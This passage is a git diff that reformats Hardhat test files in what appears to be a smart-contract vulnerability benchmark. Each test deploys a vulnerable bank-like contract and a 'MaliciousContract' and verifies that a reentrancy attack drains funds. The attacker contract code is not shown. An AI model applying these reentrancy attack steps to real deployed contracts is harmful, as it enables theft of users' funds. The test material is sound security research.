PrivateBank.deploy(log.target); + await victim.waitForDeployment(); + //await victim.setLog(log.target); // Set Log address after deployment - // Deploy MaliciousContract with PrivateBank address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with PrivateBank address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(0); - }); + it("sanity check: reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal(0); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.Deposit( {value: ethers.parseEther("5") }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.Deposit({ value: ethers.parseEther("5") }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + // Initial deposit from hacker on victim contract + await hacker.deposit({ value: ethers.parseEther("2") }); - // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("2")}); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("1")); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + hackerBalance = await ethers.provider.getBalance(hacker.target); - // Perform reentrancy attack through MaliciousContract - await hacker.attack(ethers.parseEther("1")); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - hackerBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has lost more than the 1 ethers from withdraw - expect(victimBalance).to.be.below(ethers.parseEther("6")); + // victim has lost more than the 1 ethers from withdraw + expect(victimBalance).to.be.below(ethers.parseEther("6")); - //hacker has more than the withdrawn amount - expect(hackerBalance).to.be.above(ethers.parseEther("1")); - - }); - }); - \ No newline at end of file + //hacker has more than the withdrawn amount + expect(hackerBalance).to.be.above(ethers.parseEther("1")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_test.js index 5468c13..91b46f3 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_test.js @@ -2,83 +2,90 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for 0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol", function () { - let ACCURAL_DEPOSIT; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for 0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol", function () { + let ACCURAL_DEPOSIT; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol/LogFile.json'); - const logJson = JSON.parse(fs.readFileSync(logPath)); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - log = await Log.deploy(); - await log.waitForDeployment(); + beforeEach(async function () { + // Deploy Log contract + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol/LogFile.json", + ); + const logJson = JSON.parse(fs.readFileSync(logPath)); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + log = await Log.deploy(); + await log.waitForDeployment(); - // Deploy ACCURAL_DEPOSIT contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol/ACCURAL_DEPOSIT.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - ACCURAL_DEPOSIT = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await ACCURAL_DEPOSIT.deploy(); - await victim.waitForDeployment(); - victim.SetLogFile(log.target); // Set Log address on constructor - - // Deploy MaliciousContract with ACCURAL_DEPOSIT address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy ACCURAL_DEPOSIT contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol/ACCURAL_DEPOSIT.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + ACCURAL_DEPOSIT = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await ACCURAL_DEPOSIT.deploy(); + await victim.waitForDeployment(); + victim.SetLogFile(log.target); // Set Log address on constructor - it('sanity check: reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther('10') })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.Collect(ethers.parseEther('10'))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(0); - }); + // Deploy MaliciousContract with ACCURAL_DEPOSIT address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.Deposit( {value: ethers.parseEther("5") }); + it("sanity check: reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal(0); + }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.Deposit({ value: ethers.parseEther("5") }); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); - // Initial deposit from maliciousContract on victim contract - await hacker.deposit({value: ethers.parseEther("5")}); + // Initial deposit from maliciousContract on victim contract + await hacker.deposit({ value: ethers.parseEther("5") }); - + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("3")); - // Perform reentrancy attack through MaliciousContract - await hacker.attack( ethers.parseEther("3")); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("7")); + // victim has lost more funds than the withdrawal + expect(victimBalance).to.be.below(ethers.parseEther("7")); - // hacker has more than the withdrawal - expect(maliciousContractBalance).to.be.above(ethers.parseEther("3")); - - }); - }); - \ No newline at end of file + // hacker has more than the withdrawal + expect(maliciousContractBalance).to.be.above(ethers.parseEther("3")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_test.js index 830e8a6..f5cf9a6 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_test.js @@ -12,14 +12,20 @@ describe("Reentrancy Attack for 0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol", beforeEach(async function () { // Deploy LogFile contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol/LogFile.json'); + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol/LogFile.json", + ); const logJson = JSON.parse(fs.readFileSync(logPath)); Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); log = await Log.deploy(); await log.waitForDeployment(); // Deploy PrivateETHCell contract with LogFile address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol/PRIVATE_ETH_CELL.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol/PRIVATE_ETH_CELL.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); PrivateETHCell = await ethers.getContractFactory(json.abi, json.bytecode); victim = await PrivateETHCell.deploy(); @@ -27,13 +33,18 @@ describe("Reentrancy Attack for 0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol", await victim.SetLogFile(log.target); // Set LogFile address after deployment // Deploy MaliciousContract with victim address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_attack.sol:MaliciousContract"); + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_attack.sol:MaliciousContract", + ); hacker = await MaliciousContract.deploy(victim.target); }); - it('sanity check: reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); + it("sanity check: reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; expect(await ethers.provider.getBalance(victim.target)).to.equal(0); }); @@ -43,25 +54,24 @@ describe("Reentrancy Attack for 0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol", await victim.Deposit({ value: ethers.parseEther("5") }); // verify correct deposit const initialBalance = await ethers.provider.getBalance(victim.target); - expect(initialBalance).to.equal(ethers.parseEther("5")); - + expect(initialBalance).to.equal(ethers.parseEther("5")); // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("2")}); + await hacker.deposit({ value: ethers.parseEther("2") }); - const privateBalanceAfterMaliciousDeposit = await ethers.provider.getBalance(victim.target); - expect(privateBalanceAfterMaliciousDeposit).to.equal(ethers.parseEther("7")); + const privateBalanceAfterMaliciousDeposit = + await ethers.provider.getBalance(victim.target); + expect(privateBalanceAfterMaliciousDeposit).to.equal( + ethers.parseEther("7"), + ); // we set the hackers balance to 0 - await network.provider.send("hardhat_setBalance", [ + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalanceBeforeAttack = await ethers.provider.getBalance( hacker.target, - "0x0", - ]); - let hackerBalanceBeforeAttack = await ethers.provider.getBalance(hacker.target); + ); expect(hackerBalanceBeforeAttack).to.equal(0); - - // Perform reentrancy attack through hacker await hacker.attack(ethers.parseEther("2")); @@ -70,9 +80,9 @@ describe("Reentrancy Attack for 0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol", // Check balances after attack const personalBankBalance = await ethers.provider.getBalance(victim.target); const hackerBalance = await ethers.provider.getBalance(hacker.target); - + // victim has lost more than the 2 ethers from withdraw - expect(personalBankBalance).to.be.below(ethers.parseEther("5")); + expect(personalBankBalance).to.be.below(ethers.parseEther("5")); //hacker has more than the withdrawn amount expect(hackerBalance).to.be.above(ethers.parseEther("2")); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_test.js index 8ae87e1..12f10b0 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_test.js @@ -2,73 +2,85 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for 0x561eac93c92360949ab1f1403323e6db345cbf31.sol", function () { - let BANK_SAFE; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for 0x561eac93c92360949ab1f1403323e6db345cbf31.sol", function () { + let BANK_SAFE; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol/LogFile.json'); - const logJson = JSON.parse(fs.readFileSync(logPath)); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - log = await Log.deploy(); - await log.waitForDeployment(); + beforeEach(async function () { + // Deploy Log contract + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol/LogFile.json", + ); + const logJson = JSON.parse(fs.readFileSync(logPath)); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + log = await Log.deploy(); + await log.waitForDeployment(); - // Deploy BANK_SAFE contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol/BANK_SAFE.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - BANK_SAFE = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await BANK_SAFE.deploy(); - await victim.waitForDeployment(); - await victim.SetLogFile(log.target); // Set Log address after deployment + // Deploy BANK_SAFE contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol/BANK_SAFE.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + BANK_SAFE = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await BANK_SAFE.deploy(); + await victim.waitForDeployment(); + await victim.SetLogFile(log.target); // Set Log address after deployment - // Deploy MaliciousContract with BANK_SAFE address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with BANK_SAFE address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther('10') })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.Collect(ethers.parseEther('10'))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(0); - }); + it("sanity check: reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal(0); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.Deposit( {value: ethers.parseEther("5") }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.Deposit({ value: ethers.parseEther("5") }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + // Initial deposit from maliciousContract on victim contract + await hacker.deposit({ value: ethers.parseEther("3") }); - // Initial deposit from maliciousContract on victim contract - await hacker.deposit({value: ethers.parseEther("3")}); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("8")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("8")); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("2")); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); - // Perform reentrancy attack through MaliciousContract - await hacker.attack(ethers.parseEther("2")); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has a drained account - expect(victimBalance).to.be.below(ethers.parseEther("6")); + // victim has a drained account + expect(victimBalance).to.be.below(ethers.parseEther("6")); - // 5 original balance + 3 from hacker initial deposit - expect(maliciousContractBalance).to.be.above(ethers.parseEther("2")); - - }); - }); - \ No newline at end of file + // 5 original balance + 3 from hacker initial deposit + expect(maliciousContractBalance).to.be.above(ethers.parseEther("2")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_test.js index 7cedbe4..bc30f68 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_test.js @@ -12,71 +12,81 @@ describe("Reentrancy Attack for 0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol", beforeEach(async function () { // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol/Log.json'); + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol/Log.json", + ); const logJson = JSON.parse(fs.readFileSync(logPath)); Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); log = await Log.deploy(); await log.waitForDeployment(); // Deploy U_BANK contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol/U_BANK.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol/U_BANK.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); U_BANK = await ethers.getContractFactory(json.abi, json.bytecode); victim = await U_BANK.deploy(log.target); await victim.waitForDeployment(); - + // Deploy MaliciousContract with U_BANK address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_attack.sol:MaliciousContract"); + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_attack.sol:MaliciousContract", + ); hacker = await MaliciousContract.deploy(victim.target); - }); - it('sanity check: reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol', async function () { - await expect(victim.Put(0, { value: ethers.parseEther('10') })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.Collect(ethers.parseEther('10'))).to.not.be.reverted; + it("sanity check: reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol", async function () { + await expect(victim.Put(0, { value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; expect(await ethers.provider.getBalance(victim.target)).to.equal(0); }); it("should successfully drain funds through reentrancy attack", async function () { // Initial deposit to victim contract - await victim.Put( 1, {value: ethers.parseEther("5") }); - - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + await victim.Put(1, { value: ethers.parseEther("5") }); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); // Initial deposit from maliciousContract on victim contract - await hacker.deposit({value: ethers.parseEther("5")}); + await hacker.deposit({ value: ethers.parseEther("5") }); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); //set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); let hackerBalance = await ethers.provider.getBalance(hacker.target); expect(hackerBalance).to.equal(0); // Perform reentrancy attack through MaliciousContract - // for this particular contract the MinSum is 2. + // for this particular contract the MinSum is 2. // If hacker uses an odd number will miss 1 eth - await hacker.attack( ethers.parseEther("2")); + await hacker.attack(ethers.parseEther("2")); - // Check balances after attack const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); // Verify the attack was successful - + // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("8")); + expect(victimBalance).to.be.below(ethers.parseEther("8")); - // hacker has more than the withdrawal + // hacker has more than the withdrawal expect(maliciousContractBalance).to.be.above(ethers.parseEther("2")); - }); }); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_test.js index c32b8da..ed91fdb 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_test.js @@ -12,14 +12,20 @@ describe("Reentrancy Attack for 0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol", beforeEach(async function () { // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol/Log.json'); + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol/Log.json", + ); const logJson = JSON.parse(fs.readFileSync(logPath)); Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); log = await Log.deploy(); await log.waitForDeployment(); // Deploy PrivateDeposit contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol/PrivateDeposit.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol/PrivateDeposit.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); PrivateDeposit = await ethers.getContractFactory(json.abi, json.bytecode); victim = await PrivateDeposit.deploy(); @@ -27,13 +33,18 @@ describe("Reentrancy Attack for 0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol", await victim.setLog(log.target); // Set Log address after deployment // Deploy hacker with victim address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_attack.sol:MaliciousContract"); + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_attack.sol:MaliciousContract", + ); hacker = await MaliciousContract.deploy(victim.target); }); - it('sanity check: reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); + it("sanity check: reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; expect(await ethers.provider.getBalance(victim.target)).to.equal(0); }); @@ -43,25 +54,24 @@ describe("Reentrancy Attack for 0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol", await victim.Deposit({ value: ethers.parseEther("5") }); // verify correct deposit const initialBalance = await ethers.provider.getBalance(victim.target); - expect(initialBalance).to.equal(ethers.parseEther("5")); - + expect(initialBalance).to.equal(ethers.parseEther("5")); // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("2")}); + await hacker.deposit({ value: ethers.parseEther("2") }); - const privateBalanceAfterMaliciousDeposit = await ethers.provider.getBalance(victim.target); - expect(privateBalanceAfterMaliciousDeposit).to.equal(ethers.parseEther("7")); + const privateBalanceAfterMaliciousDeposit = + await ethers.provider.getBalance(victim.target); + expect(privateBalanceAfterMaliciousDeposit).to.equal( + ethers.parseEther("7"), + ); // we set the hackers balance to 0 - await network.provider.send("hardhat_setBalance", [ + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalanceBeforeAttack = await ethers.provider.getBalance( hacker.target, - "0x0", - ]); - let hackerBalanceBeforeAttack = await ethers.provider.getBalance(hacker.target); + ); expect(hackerBalanceBeforeAttack).to.equal(0); - - // Perform reentrancy attack through hacker await hacker.attack(ethers.parseEther("2")); @@ -70,9 +80,9 @@ describe("Reentrancy Attack for 0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol", // Check balances after attack const personalBankBalance = await ethers.provider.getBalance(victim.target); const hackerBalance = await ethers.provider.getBalance(hacker.target); - + // victim has lost more than the 2 ethers from withdraw - expect(personalBankBalance).to.be.below(ethers.parseEther("5")); + expect(personalBankBalance).to.be.below(ethers.parseEther("5")); //hacker has more than the withdrawn amount expect(hackerBalance).to.be.above(ethers.parseEther("2")); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_test.js index 2d5ccaa..4e99e4d 100644 --- 